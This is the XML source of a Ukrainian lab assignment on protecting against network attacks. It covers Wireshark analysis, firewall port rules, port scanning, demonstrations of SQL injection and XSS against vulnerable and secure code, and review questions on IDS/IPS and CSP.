        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Захист веб-застосунку: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- Запустити демонстраційний код SQL-ін'єкції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 Продемонструвати успішну атаку на вразливий код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 Продемонструвати блокування атаки безпечним кодом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 Повторити для XSS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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008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8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оформити звіт та зробити висновок.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29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знімки екрана Wireshark з фільтрами;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команди та результати налаштування брандмауера;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результати сканування портів з ідентифікацією сервісів;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код та результати демонстрації SQL-ін’єкції та XSS;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висновок про методи захисту від мережевих атак.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30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409"/>
        <w:gridCol w:w="2409"/>
        <w:gridCol w:w="2409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Порт для блокування</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Порт для дозволу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21 (FTP)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Знайти в Wireshark DNS-запити. Які домени запитувалися?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23 (Telnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">80 (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Реалізувати детектор SYN-сканування (багато SYN без ACK).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25 (SMTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">993 (IMAPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Знайти в трафіку User-Agent браузера. Яку інформацію він розкриває?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110 (POP3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">995 (POP3S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Реалізувати фільтр для виявлення підозрілих POST-запитів.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135 (RPC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3389 (RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Порівняти HTTP та HTTPS трафік. Що видно в кожному?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139 (NetBIOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">445 (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Знайти ARP-запити в трафіку. Для чого вони використовуються?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143 (IMAP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">587 (SMTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Реалізувати простий rate limiter для захисту від brute force.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445 (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">22 (SSH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Проаналізувати TLS handshake. Які версії протоколу використовуються?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1433 (MSSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5432 (PostgreSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Знайти ICMP-пакети. Що показує ping?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3306 (MySQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8080 (HTTP-alt)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на CSRF-токени.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5900 (VNC)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Знайти в трафіку cookies. Які дані вони містять?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8080 (HTTP-alt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">80 (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Реалізувати whitelist IP-адрес у брандмауері.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1521 (Oracle)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Визначити операційну систему за TTL пакетів.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27017 (MongoDB)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Реалізувати логування всіх заблокованих з’єднань.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6379 (Redis)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Знайти в трафіку Referer заголовки. Яку інформацію вони розкривають?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11211 (Memcached)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Реалізувати детектор port knocking.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5432 (PostgreSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3306 (MySQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Порівняти час відповіді різних сервісів. Що це показує?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9200 (Elasticsearch)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Content-Type для захисту API.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15672 (RabbitMQ)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Знайти в трафіку WebSocket-з’єднання.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2375 (Docker)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Реалізувати blacklist IP-адрес після 5 невдалих спроб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="34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31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брандмауер і які його типи існують?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Чим IDS відрізняється від IPS?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Які порти потребують захисту в першу чергу?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сканування портів?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SQL-ін’єкція?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XSS і які його типи існують?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OWASP Top 10?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Content Security Policy?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32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Чим stateful firewall кращий за простий пакетний фільтр?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Як виявити сканування портів у мережевому трафіку? За якими ознаками?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Як параметризовані запити унеможливлюють SQL-ін’єкцію?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Чому екранування виводу захищає від XSS, а фільтрація вводу — не завжди?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Коли доцільніший IDS, а коли IPS? Наведіть по одному сценарію.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Запишіть правило брандмауера, яке дозволяє лише вихідні з’єднання на порт 443.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Чому HTTPS не захищає від усіх атак? Наведіть два приклади.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Як CSP обмежує наслідки успішної XSS-атаки?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33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12"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Побудуйте ешелоновану схему захисту веб-застосунку: які засоби на якому рівні та проти яких загроз працюють.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Система виявлення вторгнень дає багато хибних спрацьовувань. Назвіть причини та порядок налаштування, щоб їх зменшити без втрати чутливості.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оцініть, чому повне блокування вхідного трафіку не є універсальним розв’язанням, і сформулюйте критерій відкриття порту.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сформулюйте, чому більшість успішних атак використовує не технічні вразливості, а помилки конфігурації та людський фактор. Проілюструйте прикладами з роботи.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkEnd w:id="34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1134" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1701" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2268" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2835" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3402" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3969" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4536" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5103" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5670" w:hanging="425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1134" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1701" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2268" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2835" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3402" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3969" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4536" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5103" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5670" w:hanging="425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1134" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1701" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2268" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2835" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3402" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3969" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4536" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5103" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5670" w:hanging="425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1134" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1701" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2268" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2835" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3402" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3969" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4536" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5103" w:hanging="425"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="6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№9</dc:title>
  <dc:creator/>
  <dc:subject>pmzi</dc:subject>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-21T22:18:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-21T22:18:51Z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9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="order">
    <vt:lpwstr>8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="preview">
    <vt:lpwstr>Вивчення засобів захисту від атак з мережі Internet.</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="shortTitle">
    <vt:lpwstr>Програмні засоби захисту від мережевих атак</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="subtitle">
    <vt:lpwstr>Програмні засоби захисту від атак з мережі Internet</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="type">
    <vt:lpwstr>lab</vt:lpwstr>
  </property>
</Properties>
</file>